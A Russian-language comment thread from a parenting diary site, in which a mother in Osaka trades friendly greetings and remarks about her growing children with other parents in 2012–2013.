Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

приятно познакомиться, прошу прощения, только сейчас увидела это сообщение.

0
16.08.2013

Каким-то странным образом вышла на вашу страницу. У меня у подруги сын родился  15 апреля 2011 года. Я видели его недавно. Уже и не помнится когда он был таким как ваш младшенький :) Здоровья вам и крепости духа всему семейству!!!

0
09.10.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

спасибо! да, детки быстро растут, вон и мой уже скоро пойдет и говорить начнет, а вроде только родила )))) И вам всего наилучшего

0
09.10.2012
Юлианна
Максим Дмитриевич, 14 лет 11 месяцев Электросталь

замечательная история,я вообще уже второй час читаю ваш дневник)))даайте дружить???

0
25.07.2012
Elena
Лукас, 21 год 10 месяцевТатэваки, 14 лет 2 месяцаТогэцу, 11 лет 9 месяцев Осака

Спасибо, конечно давай дружить!

0
25.07.2012
Японцы - ответственные люди а сегодня на обед

Похожие записи